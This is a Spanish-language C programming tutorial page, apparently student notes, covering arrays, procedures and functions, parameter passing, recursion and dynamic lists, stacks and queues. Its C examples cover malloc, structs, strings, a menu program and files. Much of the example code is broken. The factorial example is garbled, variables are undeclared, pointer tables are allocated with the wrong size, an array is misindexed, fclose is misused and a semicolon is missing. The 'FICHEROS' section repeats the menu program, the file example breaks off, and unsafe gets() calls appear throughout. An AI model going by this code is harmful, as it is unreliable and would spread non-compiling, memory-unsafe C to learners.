Escribir(A): escribir el array entero.
Leer V(1): leer el elemento 1 del array.
• Recorrido o acceso secuencial al vector: es la operación con la que vamos a realizar una acción general sobre todos los elementos del vector. Dependiendo de la dimensión del array se hace de una manera o de otra. En los bidimensionales se realiza de forma más compleja. Se puede leer del principio a fin o del final al principio.
• Actualización: esta compuesta de tres operaciones: añadir, insertar y borrar.
• Añadir: significa agregar un elemento al final del array. Se trata de una asignación. Esto lo podemos hacer cuando tenemos uno o más elementos al final del array vacíos. Tenemos que fijarnos en la dimensión.
• Insertar: introducir un elemento entre los ya existentes. Tiene que haber elementos vacíos y tenemos que cambiar los que van después del que insertamos.
2. Bidimensionales: Son arrays de dos dimensiones y se les conoce con el nombre de matrices. Tienen 2 índices por lo que cada componente de la matriz se direcciona con el nombre de la matriz seguido de dos índices separados por comas.
Tratamiento secuencial o recorrido de una matriz
El recorrido de una matriz se realiza mediante el anidamiento de dos bucles desde. El bucle externo recorre cada una de las filas y el interno todos los componentes de una fila. Este tratamiento también se puede realizar por columnas en casos en los que nos interese y además en ambos casos en orden creciente y decreciente para las filas y columnas.
3. Arrays MULTIDIMENSIONALES: Son los arrays desde 3 hasta n dimensiones. También se les llama poliedros. Es necesario que los n subíndices estén declarados o identificados, para poder localizar un elemento individual del poliedro. Un array de n dimensiones se puede identificar de la siguiente manera.
A [P1:U1, P2:U2, ...... , PN:UN]
A [I1, I2, ...... , In] (estos I son los índices que nos van a ayudar a localizar un elemento).
Componentes:
P[1,1,1], P[1,1,2]....P[1,1,n]
P[1,2,1], P[1,2,2]....P[1,2,n]
P[1,n,n],.....P[n,n,n].
Índices:
[1......n]
[1......n]
[1......n]
Longitud: N.
Tratamiento secuencial o recorrido de un poliedro
Requiere tantos bucles desde anidados como dimensiones tenga el poliedro. Cada índice de un bucle recorre una dimensión y puede hacerse en cualquier orden de anidamiento.
SUBALGORITMOS O SUBPROGRAMAS: PROCEDIMIENTOS Y FUNCIONES
El método para solucionar un programa complejo es dividirlo en subprogramas que sean sencillos de resolver. Cuando se trabaja de esta manera existirá un algoritmo principal o conductor que transfiera el control a los distintos subalgoritmos, los cuales, cuando terminen su tarea, devolverán el control al algoritmo que los llamo. Existen dos tipos de subprogramas: funciones y procedimientos.
1. FUNCIONES
Una función a partir de uno o más valores llamados argumentos o parámetros devuelve un resultado en el nombre de la función.
Declaración de funciones: una función constaría de:
a) Cabecera: también se le llama definición de la función. En la definición de la función deben figurar una serie de parámetros, llamados parámetros formales para que cuando se llame a la función se pueda establecer una correspondencia 1 a 1 y de izquierda a derecha entre los parámetros actuales y formales.
b) En el cuerpo de la función estarán el bloque de declaraciones y el bloque de instrucciones. Debe incluir una instrucción mediante la cual la función tomaría un valor para devolverlo al programa principal o llamador.
Función < nombre de la función > (lista de parámetros formales): tipo de dato devuelto.
Declaración de las variables locales.
Instrucciones (Inicio).
Los tipos de datos validos como resultado de una función son: ordinales, reales, cadenas, punteros y lógicos.
En una lista de parámetros formales es posible separar estos parámetros con ; y hay que indicar cada tipo.
2. PROCEDIMIENTOS
Un procedimiento es un subprograma o subalgoritmo que realiza una tarea especifica y que puede ser definido mediante 0, 1 o n parámetros.
Tanto la entrada de información al procedimiento como la devolución de resultados desde el procedimiento al programa principal o llamador o conductor se realiza a través de los parámetros. El nombre de un procedimiento no esta asociado a ninguno de los resultados que obtiene. La llamada a un procedimiento se realiza con la instrucción “Llamar_a” o directamente con el nombre del procedimiento, es decir:
<nombre del procedimiento> (lista de parámetros que se llaman actuales o reales).
Declaración de procedimientos: es similar a la de una función excepto que el nombre del procedimiento no se encuentra asociado a ningún resultado.
Procedimiento <nombre del procedimiento>(lista de parámetros formales)
(declaración de variables locales)
Inicio
.
.
.
Fin_procedimiento
La lista de parámetros formales se debe separar por ; y debemos indicar el tipo de cada uno de ellos.
3. VARIABLES LOCALES Y GLOBALES
Las variables utilizadas en los programas principales y en los subprogramas se clasifican en dos tipos: variables locales y variables globales.
• Variables locales: una variable es local si esta declarada y definida dentro de un subprograma y es distinta de las variables que tengan el mismo nombre que hayan sido declaradas en el programa principal.
Cuando otro subprograma utiliza el mismo nombre al declarar una variable ambas serán distintas y tendrán diferentes posiciones de memoria, por lo tanto solo tendrán vigencia en el subprograma donde han sido declaradas. El uso de variables locales tiene la ventaja de hacer a los subprogramas independientes y la comunicación con el programa principal se realizara exclusivamente a través de los parámetros.
• Variables globales: una variable es global cuando el ámbito (SCOPE) en el que dicha variable se conoce es el programa completo y debe haber sido declarada en el programa principal. Tienen la ventaja de compartir información de diferentes subprogramas. Sin una correspondiente entrada en la lista de parámetros.
4. COMUNICACIÓN CON SUBPROGRAMAS: PASO DE
PARÁMETROS
Cuando un programa llama a un subprograma, la información se comunica a través de una lista de parámetros y se establece una correspondencia automática entre los parámetros formales y actuales. Los parámetros actuales son sustituidos o utilizados en lugar de los parámetros formales. La declaración del subprograma se hace:
Procedimiento <nombre>(tipo de dato: dato; tipo de dato: dato; ...) Parámetros formales.
Y la llamada al subprograma se hace con:
Llamar_a <nombre del procedimiento> (valores que va a tomar el procedimiento: )
Existen dos métodos para establecer la correspondencia de parámetros:
• Correspondencia posicional: es la que se utiliza en C. La correspondencia se establece emparejando los parámetros reales y formales, según su posición en las listas. Fi se corresponde con Ai (F: formal, A: actual).
• Correspondencia por el nombre explicito o método de paso de parámetros por el nombre. En este método en las llamadas se indica explícitamente la correspondencia entre los parámetros reales y formales.
• 5. TRANSMISIÓN DE PARÁMETROS
Los métodos de transmisión de parámetros más utilizados son:
• Por valor: el paso de un parámetro por valor significa que el valor del argumento (parámetro actual o real) se asigna al parámetro formal, es decir, antes de que el subprograma comience a ejecutarse el argumento toma un valor especifico. Este valor se copia en el correspondiente parámetro formal dentro del subprograma. Una vez que el procedimiento empieza a ejecutarse, cualquier cambio de valor de uno de los parámetros formales no se refleja en un cambio en el correspondiente argumento (parámetros reales), es decir, que cuando el subprograma termine de ejecutarse el argumento actual (parámetros actuales) tendrá el mismo valor que cuando el subprograma comenzó, independientemente de lo que les haya sucedido a los parámetros formales. A estos parámetros se les llama parámetros valor. Y cuando hagamos la declaración tendremos que hacerlo a través de E (entrada).
• Por referencia: el paso de parámetros por referencia, que se les llama también parámetros variables, significa que la posición o dirección de (no del valor) del argumento o parámetro actual se envía al subprograma, es decir, que si a un parámetro formal se la da el atributo de parámetro por referencia y si el parámetro actual es una variable, entonces un cambio en el parámetro formal se refleja en un cambio en el correspondiente parámetro actual, porque ambos tienen la misma posición de memoria. Para indicar que deseamos transmitir un parámetro por dirección cuando hagamos la declaración de los parámetros, lo haremos a través de E/S o S.
• 6. EFECTOS LATERALES
Las modificaciones que se produzcan mediante una función o procedimiento en los elementos situados fuera del subprograma se llaman efectos laterales. En algunos casos son beneficiosos para la programación pero no es recomendable no utilizarlos.
• Efectos laterales en procedimientos: la comunicación del procedimiento con el resto del programa se tiene que hacer a través de los parámetros. Cualquier otra comunicación entre el procedimiento y el resto del programa son efectos laterales. Estos efectos son perjudiciales en la mayoría de los casos. Si un procedimiento modifica una variable global (distinta de un parámetro actual) esto es un efecto lateral, por ello excepto en contadas ocasiones, no debe aparecer en la declaración del procedimiento. Si se necesita una variable temporal en un procedimiento es mejor utilizar una variable local, que habría que declarar en el procedimiento.
• Si queremos que el programa modifique el valor de una variable global es mejor utilizar un parámetro formal, variable en la declaración del procedimiento, y después usar la variable global como el parámetro actual en una llamada al procedimiento.
En general, se debe seguir la regla de no utilizar ninguna variable global en procedimiento, aunque esto no significa que los procedimientos no puedan manipular variables globales.
En el cuerpo de un procedimiento es mejor utilizar un parámetro formal o una variable local. En los lenguajes donde es posible declarar constantes, se puede utilizar constantes globales ya que no pueden ser modificadas por el procedimiento.
• Efectos laterales en funciones: Una función toma los valores de los argumentos y devuelve un único valor. Sin embargo, al igual que en los procedimientos, una función puede hacer cosas similares a ellos.
• Una función puede tener parámetros variables, además de parámetros valor (no devuelven nada) en una lista de parámetros formales. Una función puede cambiar el contenido de una variable global y ejecutar instrucciones de E/S. Estas operaciones se conocen como parámetros laterales y se deben evitar. Toda la información que se transmite entre procedimientos y funciones debe realizarse (al igual que en los procedimientos) a través de la lista de parámetros y no a través de las variables globales. Esto convertirá al procedimiento o función en módulos independientes que pueden ser comprobados y depurados por si solos, lo que evitara preocuparnos por el resto de las partes del programa.
7. RECURSIVIDAD
Un subprograma puede llamar a cualquier otro subprograma y este a otro y así sucesivamente, que es lo que se llama anidación. Pero también se pueden llamar a si mismos.
• llamar_a A
• --------------------
• Llamar_a B
• Llamar_a A
• Otra función o procedimiento que se puede llamar así mismo se llama recursivo. Es una herramienta muy potente en algunas aplicaciones, sobre todo en calculo, y puede ser utilizada como una alternativa a la repeticion o estructura repetitiva. La escritura de un procedimiento o función recursiva es similar a los procedimientos o funciones normales, sin embargo, para evitar que la recursion continúe indefinidamente es preciso incluir una condición de terminación.
La razón de que existan lenguajes que admitan la recursividad se debe a la existencia de estructuras especificas tipo pilas y memorias dinámicas. Las direcciones de retorno y el estado de cada subprograma se guardan en estructuras tipo pilas.
TEMA 7: ESTRUCTURAS DINAMICAS LINEALES DE DATOS
Hay otro tipo de estructuras que pueden ampliar o limitar su tamaño mientras se ejecuta el programa: estructuras dinámicas
ESTRUCTURAS DINAMICAS
Estas estructuras son generadas mediante un tipo de dato conocido con el nombre de puntero. Una variable de tipo puntero almacena la dirección o posición de otra variable. La principal ventaja que tiene usar este tipo de datos es que se pueden adquirir posiciones de memoria cuando se necesitan y liberarlas cuando ya no se necesitan. De esta manera se pueden crear estructuras dinámicas que se expandan o contraigan según agreguemos o eliminemos elementos. Un puntero es una variable que almacena la posición de una variable dinámica de un tipo determinado y llega a la variable numérica apuntada. El tipo de dato puede ser simple o estructurado y podemos realizar las siguientes operaciones:
• Inicialización:
• Programación en C
• Comparación: p=q, p<>q
• Asignación: p!q
• Creación de variables dinámicas: consiste en reservar un espacio en memoria para la variable dinámica. Reservar (p).
Eliminación de variables dinámicas: consiste en desocupar el espacio en memoria que está siendo utilizado por las variables dinámicas. Liberar (p)
Una variable dinámica es una variable simple o estructurada de datos sin nombre y creada en tiempo de ejecución, por lo tanto, para poder acceder a una variable numérica apuntada como no tiene nombre usaremos "!". Las variables dinámicas pueden intervenir en cualquier operación o expresión para una variable estática de su mismo tipo. Pueden ser de dos tipos: lineales y no lineales.
1. LINEALES
a) LISTAS
Son secuencias de 0 o más elementos de un tipo de datos almacenado en memoria. Son estructuras lineales donde cada elemento de una lista excepto el primero tiene un único predecesor y cada elemento de la lista excepto el ultimo tiene un sucesor. Al número de elementos de una lista se le llama longitud, y decimos que una lista está vacía si tiene 0 elementos. Se pueden añadir nuevos elementos o suprimirlos de cualquier posición.
Tipos de listas lineales:
• Listas contiguas: los elementos son adyacentes en la memoria del ordenador y tienen unos limites (izquierdo y derecho o inferior y superior) que no pueden ser rebasados cuando se añade un nuevo elemento. Se implementan a través de arrays y la inserción o eliminación de un elemento necesitará una traslación por parte de los elementos de la lista, excepto para la cabecera y el final de la lista.
• Listas enlazadas: los elementos se almacenan en posiciones de memoria que no son adyacentes o contiguas, por lo que cada elemento necesita almacenar la posición del siguiente elemento de la lista. Son bastante más flexibles y potentes que las listas contiguas y la inserción o el borrado de un elemento no requiere el desplazamiento de los demás elementos de la lista. Se implementan, normalmente, de forma dinámica, pero si el lenguaje de programación no lo permite se utilizaran arrays, con lo cual tendremos limitaciones en cuanto al número de elementos que pueda contener la lista y además establece una ocupación de memoria constante.
Gráficamente se representa de la siguiente forma:
• Listas circulares: son una modificación de las listas enlazadas en las que el puntero del ultimo elemento apunta al primero de la listas.
Gráficamente se representa de la siguiente forma:
Programación en C
Debemos diseñar un nodo especial llamado nodo cabecera que está permanentemente asociado a la existencia de la lista y cuyo campo para almacenar información no se utiliza. Así, al efectuar un recorrido de la lista, el nodo cabecera nos permitirá detectar cuándo han sido visitados todos los demás nodos.
• Listas doblemente enlazadas: Se pueden recorrer tanto del final al principio como de principio a fin. Cada nodo de las listas de este tipo consta de un campo con información y de otros dos campos que son de tipo puntero y que podríamos denominar anterior y siguiente, uno desde su nodo anterior y otro de su nodo sucesor.
• Listas doblemente encadenadas circulares: en este tipo de listas el campo anterior del primer nodo apunta al ultimo nodo y el campo siguiente del ultimo nodo apunta al primero.
b) PILAS
Son unas estructuras que son más utilizadas siempre que se quieran recuperar una serie de elementos en orden inverso a como se introdujeron.
Tanto la extracción como la inserción de un elemento en la pila se realiza por la parte superior, por lo tanto, el único elemento al que podemos acceder es el ultimo, y como el ultimo elemento que se pone en la pila es el primero que se puede sacar, a estas estructuras dinámicas llamadas pilas se les conoce como LIFO (Last In First Off). Las pilas se deben implementar de forma dinámica utilizando punteros, pero si el lenguaje de programación que estamos utilizando no admite punteros, entonces tendremos que utilizar arrays, y además una variable que normalmente se le da el nombre de `cima' y es la que apunta al último elemento de la pila.
Programación en C
Aplicaciones de las pilas: el uso más común que suele darse a las pilas es cuando hacemos una llamada desde un programa a otro subprograma. Se utiliza las pilas para guardar el lugar desde donde se hizo la llamada y para almacenar el estado de las variables en el momento en que se hace la llamada. También se utilizan en todos los algoritmos recursivos para almacenar el valor de las variables y los parámetros.
c) COLAS
Una cola es también una estructura de datos lineal en donde las eliminaciones se realizan por uno de sus extremos que normalmente se llama frente, y las inserciones se realizan por el otro extremo que normalmente se llama final. A estas estructuras se les llama FIFO (First In First Out).
Se tiene que implementar de forma dinámica usando punteros a menos que el lenguaje que utilicemos lo permita, y entonces tendremos que utilizar arrays.
Representación grafica de colas hechas con arrays.
Programación en C
Programación en C
SOLUCIONES en el caso de que la variable `final' coincida con el máximo del array aunque haya posiciones libres.
• Retroceso: consiste en mantener fijo a 1 el valor de la variable `frente' realizando un desplazamiento de una posición para todos los elementos ocupados cada vez que se produce una eliminación.
• Programación en C
• Reestructuración: la variable `final' llega al máximo de los elementos, los elementos ocupados se deben desplazar hacia atrás, las posiciones que hagan falta para que el principio de la lista coincida con el principio del array, es decir:
• Programación en C
• Mediante un array circular: se considera que el elemento primero sigue al elemento ultimo. Para esta implementación debemos dejar una posición libre que separe el principio y el final de la cola.
• Programación en C
MALLOC
#include <stdio.h>
#include <stdlib.h>
void main ()
{
int i,j,fl,nel=0;
int **ptabla;
printf("\n\t Escribe el numero de nombres \n");
scanf("%i",&fl);
printf("\n\t Escribe el numero de columnas \n");
scanf("%i",&cl);
ptabla=(int**)malloc(fl*sizeof(int));
for (i=0;i<cl;i++)
{
ptabla[i]=(int*)malloc(cl*sizeof(int));
}
for (i=0;i<fl;i++)
{
for(j=0;j<cl;j++)
{
printf("Escribe el elemento \n");
scanf("%i",&ptabla[i][j]);
}
}
for (i=0;i<fl;i++)
{
for(j=0;j<cl;j++)
{
printf("%4i",*(*ptabla)++);
}
printf("\n");
*ptabla-=cl;
ptabla++;
}
ptabla-=fl;
for (i=0;i<fl;i++)
{
free(ptabla[i]);
}
free(ptabla);
}
MALLOC (2ª PARTE)
#include <stdio.h>
#include <stdlib.h>
crear(int **ptabla,int *cuan)
{
*ptabla=(int *)malloc(sizeof(int)**cuan);
}
rellenar(int *ptabla,int cuan)
{
int i;
for (i=0;i<cuan;i++)
{
printf("\n\t escribe el elemento: ");
scanf("%i",ptabla++);
}
}
listar(int *ptabla,int cuan)
{
int i;
for(i=0;i<cuan;i++)
{
printf("\n\t el elemento es: %i",*ptabla++);
}
fflush(stdin);
getchar();
}
ordenar(int *ptabla,int cuan)
{
fflush(stdin);
getchar();
for (i=0;i<cuan;i++)
{
for(j=0;j<cuan-1;j++)
{
if(*ptabla<*(ptabla+1))
{
aux=*ptabla+1;
*(ptabla+1)=*ptabla;
*(ptabla)=aux;
}
ptabla++;
}
ptabla-=cuan;
}
}
}
void main()
{
int opci;
int* ptabla;
int cuantos;
printf("\n\t escribe cuantos elementos \n");
scanf("%i",&cuantos);
do
{
system("clear");
printf("\n\t 1 para crear tabla");
printf("\n\t 2 para rellenar tabla");
printf("\n\t 3 listar tabla");
printf("\n\t 4 para ordenar");
printf("\n\t 5 para salir \n");
scanf("%i",&opci);
switch (opci)
{
case 1:
crear(&ptabla,&cuantos);
break;
case 2:
rellenar(&ptabla,cuantos);
break;
case 3:
listar(&ptabla,cuantos);
break;
case 4:
ordenar(&ptabla,cuantos);
break;
case 5:
free(*ptabla);
exit(0);
}
}while(opci!=5 );
}
ESTRUCTURAS
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
union t_variable
{
char autor[15];
int edicion;
};
struct t_biblio
{
int codigo;
char nombre[30];
char tipo;
union t_variable unvariable;
};
void listar(struct t_biblio alma[],int *cant);
void alta(struct t_biblio alma[],int *cant);
void main()
{
struct t_biblio fichas[10];
int cantidad=0,opcion;
do
{
system("clear");
printf("\n\t Escribe lo que quieres hacer 1 listar 2 para dar de alta\n\t ");
printf("\n\t Escribe la opcion \t");
scanf("%i",&opcion);
if (opcion==1)
{
listar(fichas,&cantidad);
}
else
{
alta(fichas,&cantidad);
}
}
while(opcion!=199);
}
void listar(struct t_biblio alma[],int *cant)
{
int i;
for(i=0;i<*cant;i++)
{
system("clear");
printf("\n\tnombre: %s ",alma[i].nombre);
printf("\n\tcodigo: %i ",alma[i].codigo);
printf("\n\ttipo: %c ",alma[i].tipo);
if(alma[i].tipo=='l')
{
printf("\n\tautor: %s ",alma[i].unvariable.autor);
}
else
{
printf("\n\tedicion: %i ",alma[i].unvariable.edicion);
}
fflush(stdin);
printf("\n\t pulsa una tecla para continuar");
getchar();
}
}
void alta(struct t_biblio alma[],int *cant)
{
char opci;
system("clear");
printf("\n\tescribe el tipo p(periodicos) l(libros): ");
fflush(stdin);
scanf("%c",&opci);
switch (opci)
{
case 'p':
printf("\n\tescdribe el nombre: ");
fflush(stdin);
gets(alma[*cant].nombre);
printf("\n\t escribe el codigo : ");
fflush(stdin);
scanf("%i",&alma[*cant].codigo);
printf("\n\t escribe la edicion: ");
fflush(stdin);
scanf("%i",&alma[*cant].unvariable.edicion);
alma[*cant].tipo='p';
(*cant)++;
break;
case 'l':
printf("\n\t escribe el nombre: ");
fflush(stdin);
gets(alma[*cant].nombre);
printf("\n\t escribe el codigo: ");
fflush(stdin);
scanf("%i",&alma[*cant].codigo);
printf("\n\t escribe el autor: ");
fflush(stdin);
gets(alma[*cant].unvariable.autor);
alma[*cant].tipo='l';
(*cant)++;
break;
}
}
STRING DINAMICAS
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
void main ()
{
int i,j,fl,nel=0;
char nombre[50];
char **ptabla;
printf("\n\t Escribe el numero de nombres \n");
scanf("%i",&fl);
ptabla=(char**)malloc(fl*sizeof(char));
for (i=0;i<fl;i++)
{
printf("Escibe el nombre");
gets(nombre);
ptabla[i]=(char*)malloc((strlen(nombre)+1)*sizeof(char));
strcpy(ptabla[i],nombre);
}
for (i=0;i<fl;i++)
printf("%4s\n",*ptabla++);
ptabla-=fl;
for (i=0;i<fl;i++)
{
free(ptabla[i]);
}
free(ptabla);
}
RECURSIVIDAD
#include <stdio.h>
#include <stdlib.h>
void main()
int factorial(int n)
{
res=num*factorial-1;
return(res);
}
{
int num,res;
printf("Escribe el numero");
scanf("%i",&num);
if (num > 1)
{
res=num*factorial(num-1);
}
return res;
printf("resultado es %i",res);
}
MENU
#include <stdlib.h>
#include <stdio.h>
void maximo(int datos[],int cantidad)
{
int i,mayor=0;
system("clear");
for (i=0;i<cantidad;i++)
{
if (datos[i]>=mayor)
mayor=datos[i];
}
printf("el mayor es %i \n",mayor);
fflush(stdin);
getchar();
system("clear");
}
void leer(int numeros [],int *cantidad)
{
int i;
char op='n';
system("clear");
while(op!='s')
{
printf("escribe un numero -s- para salir \n");
scanf("%i",&numeros[*cantidad]);
(*cantidad)++;
printf("escribe s para salir \n");
scanf("%s",&op);
}
system("clear");
}
void menor(int numeros [],int cantidad)
{
int i;
long menor=100000;
system("clear");
for (i=0;i<cantidad;i++)
{
if(numeros[i]<=menor)
menor=numeros[i];
}
printf(" el menor es %i \n",menor);
fflush(stdin);
getchar();
system("clear");
}
void ordenar(int numeros [],int cantidad)
{
int i,c,aux;
system("clear");
for(c=0;c<cantidad;c++)
{
for (i=0;i<cantidad-1;i++)
{
if (numeros[i]>numeros[i+1])
{
aux=numeros[i+1];
numeros[i+1]=numeros[i];
numeros[i]=aux;
}
}
}
system("clear");
}
void visualizar(int numeros[],int cantidad)
{
int i;
system("clear");
for(i=0;i<cantidad;i++)
{
printf("\n el elemento %i es %i ",i,numeros[i]);
}
fflush(stdin);
getchar();
system("clear");
}
void anadir(int numeros[],int *cantidad)
{
if(*cantidad<=10)
{
system("clear");
printf(" dime el numero \n");
scanf("%i",&numeros[*cantidad]);
(*cantidad)++;
}
else
{
printf("\n\t no se pueden anadir mas numeros ");
}
}
void eliminar(int numeros[], int *cantidad)
{
int pos,i;
if (*cantidad!=0)
{
printf("dime la posicion que quieres borrar hay %i posiciones",*cantidad);
scanf("%i",&pos);
for(i=pos-1;i<*cantidad-1;i++)
{
numeros[i]=numeros[i+1];
}
(*cantidad)--;
}
else
{
printf("\n\tno hay valores que eliminar");
}
}
void main()
{
int datos[10],cant;
char opci;
system("clear");
do
{
printf(" \n\t pulsa 1 para introducir datos \n");
printf(" \n\tpulsa 2 para ordenar los datos \n");
printf(" \n\tpulsa 3 para ver el mayor \n");
printf(" \n\tpulsa 4 para ver el menor \n");
printf(" \n\tpulsa 5 para ver los datos \n");
printf(" \n\tpulsa 6 para anadir \n");
printf(" \n\tpulsa 7 para eliminar \n");
printf(" \n\tpulsa 8 para salir \n");
printf(" \n\telige una opcion :");
scanf("%s",&opci);
switch (opci)
{
case '1':
leer(datos,&cant);
break;
case '2':
ordenar(datos,cant);
break;
case '3':
maximo(datos,cant);
break;
case '4':
menor(datos,cant);
break;
case '5':
visualizar(datos,cant);
break;
case '6':
anadir(datos,&cant);
break;
case '7':
eliminar(datos,&cant);
break;
case '8':
exit(0);
default:
continue;
}
}
while(opci>=1||opci<=7);
}
FICHEROS
#include <stdlib.h>
#include <stdio.h>
void maximo(int datos[],int cantidad)
{
int i,mayor=0;
system("clear");
for (i=0;i<cantidad;i++)
{
if (datos[i]>=mayor)
mayor=datos[i];
}
printf("el mayor es %i \n",mayor);
fflush(stdin);
getchar();
system("clear");
}
void leer(int numeros [],int *cantidad)
{
int i;
char op='n';
system("clear");
while(op!='s')
{
printf("escribe un numero -s- para salir \n");
scanf("%i",&numeros[*cantidad]);
(*cantidad)++;
printf("escribe s para salir \n");
scanf("%s",&op);
}
system("clear");
}
void menor(int numeros [],int cantidad)
{
int i;
long menor=100000;
system("clear");
for (i=0;i<cantidad;i++)
{
if(numeros[i]<=menor)
menor=numeros[i];
}
printf(" el menor es %i \n",menor);
fflush(stdin);
getchar();
system("clear");
}
void ordenar(int numeros [],int cantidad)
{
int i,c,aux;
system("clear");
for(c=0;c<cantidad;c++)
{
for (i=0;i<cantidad-1;i++)
{
if (numeros[i]>numeros[i+1])
{
aux=numeros[i+1];
numeros[i+1]=numeros[i];
numeros[i]=aux;
}
}
}
system("clear");
}
void visualizar(int numeros[],int cantidad)
{
int i;
system("clear");
for(i=0;i<cantidad;i++)
{
printf("\n el elemento %i es %i ",i,numeros[i]);
}
fflush(stdin);
getchar();
system("clear");
}
void anadir(int numeros[],int *cantidad)
{
if(*cantidad<=10)
{
system("clear");
printf(" dime el numero \n");
scanf("%i",&numeros[*cantidad]);
(*cantidad)++;
}
else
{
printf("\n\t no se pueden anadir mas numeros ");
}
}
void eliminar(int numeros[], int *cantidad)
{
int pos,i;
if (*cantidad!=0)
{
printf("dime la posicion que quieres borrar hay %i posiciones",*cantidad);
scanf("%i",&pos);
for(i=pos-1;i<*cantidad-1;i++)
{
numeros[i]=numeros[i+1];
}
(*cantidad)--;
}
else
{
printf("\n\tno hay valores que eliminar");
}
}
void main()
{
int datos[10],cant;
char opci;
system("clear");
do
{
printf(" \n\t pulsa 1 para introducir datos \n");
printf(" \n\tpulsa 2 para ordenar los datos \n");
printf(" \n\tpulsa 3 para ver el mayor \n");
printf(" \n\tpulsa 4 para ver el menor \n");
printf(" \n\tpulsa 5 para ver los datos \n");
printf(" \n\tpulsa 6 para anadir \n");
printf(" \n\tpulsa 7 para eliminar \n");
printf(" \n\tpulsa 8 para salir \n");
printf(" \n\telige una opcion :");
scanf("%s",&opci);
switch (opci)
{
case '1':
leer(datos,&cant);
break;
case '2':
ordenar(datos,cant);
break;
case '3':
maximo(datos,cant);
break;
case '4':
menor(datos,cant);
break;
case '5':
visualizar(datos,cant);
break;
case '6':
anadir(datos,&cant);
break;
case '7':
eliminar(datos,&cant);
break;
case '8':
exit(0);
default:
continue;
}
}
while(opci>=1||opci<=7);
}
FICHEROS (2ª PARTE)
#include <stdio.h>
struct tdatos{
int nume;
float real;
};
void main(){
struct tdatos dato[10];
FILE *pfich;
pfich=fopen("ficher","w");
dato.nume[0]=1;
dato.real[0]=23.4;
fwrite(&dato,sizeof(dato),1,pfich)
fclose("ficher");
pfich=fopen("ficher","r");
PASAR ARGUMENTOS DE L DE COMANDO
#include <stdio.h>
int main(int c,char* args[])
{
int i;
/* mostrar los argumentos pasados atraves de la linea de comandos */
while (i<c)
{
printf("los argumentos pasados son :%s\n",args[i]);
i++;
}
}
25
|
{
"url": "http://html.rincondelvago.com/programacion-en-c_9.html",
"source_domain": "html.rincondelvago.com",
"snapshot_id": "crawl=CC-MAIN-2014-52",
"warc_metadata": {
"Content-Length": "66202",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:AHNLTP5GNCWR6S4SBRQ2KNFAJX3YCSJU",
"WARC-Concurrent-To": "<urn:uuid:b4d606bc-1e6c-41c3-bdee-446f616500be>",
"WARC-Date": "2014-12-18T05:51:06Z",
"WARC-IP-Address": "198.64.137.181",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:IRRBRHRI6IJJ357CPGVNE7HOJLDHLRHE",
"WARC-Record-ID": "<urn:uuid:1d25dc94-c8d9-4c72-9506-11953573ab9c>",
"WARC-Target-URI": "http://html.rincondelvago.com/programacion-en-c_9.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:eb26acd1-0531-430f-a0cf-e02e1216263a>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-231-17-201.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-52\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for December 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
18,
19,
140,
141,
166,
189,
213,
228,
229,
240,
241,
293,
294,
310,
311,
479,
480,
565,
566,
693,
694,
722,
723,
849,
850,
905,
906,
1024,
1025,
1102,
1103,
1196,
1197,
1243,
1244,
1367,
1368,
1404,
1405,
1413,
1414,
1420,
1421,
1426,
1427,
1432,
1433,
1438,
1439,
1444,
1445,
1452,
1453,
1459,
1460,
1487,
1488,
1549,
1550,
1561,
1562,
1574,
1575,
1587,
1588,
1617,
1618,
1637,
1638,
1659,
1660,
1680,
1681,
1704,
1705,
1837,
1838,
1948,
1949,
1968,
1969,
1995,
1996,
2015,
2016,
2027,
2028,
2139,
2140,
2236,
2237,
2262,
2263,
2334,
2335,
2429,
2430,
2521,
2522,
2832,
2833,
2842,
2843,
2895,
2896,
2904,
2905,
2991,
2992,
3019,
3020,
3056,
3057,
3100,
3101,
3146,
3147,
3483,
3484,
3568,
3569,
3785,
3786,
3947,
3948,
4187,
4188,
4241,
4242,
4597,
4598,
4905,
4906,
4943,
4944,
5044,
5045,
5062,
5063,
5098,
5099,
5134,
5135,
5163,
5164,
5177,
5178,
5193,
5194,
5209,
5210,
5225,
5226,
5243,
5244,
5298,
5299,
5474,
5475,
5536,
5537,
5934,
5935,
5952,
5953,
6082,
6083,
6139,
6140,
6453,
6454,
6677,
6678,
6770,
6771,
6813,
6814,
6842,
6843,
6957,
6958,
7069,
7070,
7092,
7093,
7235,
7236,
7646,
7647,
7733,
7734,
7885,
7886,
7961,
7962,
8001,
8002,
8013,
8014,
8020,
8021,
8027,
8028,
8034,
8035,
8057,
8058,
8164,
8165,
8201,
8202,
8350,
8351,
8562,
8563,
8974,
8975,
9292,
9293,
9339,
9340,
9355,
9356,
9684,
9685,
9778,
9779,
9824,
9825,
9909,
9910,
9984,
9985,
10204,
10205,
10410,
10411,
10444,
10445,
10510,
10511,
11387,
11388,
12038,
12039,
12064,
12065,
12314,
12315,
12965,
12966,
13217,
13218,
13403,
13404,
13649,
13650,
13858,
13859,
14552,
14553,
14573,
14574,
14747,
14748,
14763,
14764,
14789,
14790,
14805,
14806,
14821,
14822,
15291,
15292,
15539,
15540,
15592,
15593,
15720,
15721,
15747,
15748,
16446,
16447,
16467,
16468,
16490,
16491,
16518,
16519,
16539,
16540,
16661,
16662,
16813,
16814,
17203,
17204,
17220,
17221,
17235,
17236,
17672,
17673,
17703,
17704,
18107,
18108,
18754,
18755,
18809,
18810,
18954,
18955,
19009,
19010,
19032,
19033,
19341,
19342,
19670,
19671,
19854,
19855,
19868,
19869,
20014,
20015,
20665,
20666,
20688,
20689,
21106,
21107,
21120,
21121,
21414,
21415,
21571,
21572,
21627,
21628,
21650,
21651,
21673,
21674,
21791,
21792,
21990,
21991,
22013,
22014,
22257,
22258,
22280,
22281,
22481,
22482,
22504,
22505,
22516,
22517,
22540,
22541,
22565,
22566,
22583,
22584,
22590,
22591,
22613,
22614,
22632,
22633,
22685,
22686,
22707,
22708,
22761,
22762,
22783,
22784,
22826,
22827,
22850,
22851,
22857,
22858,
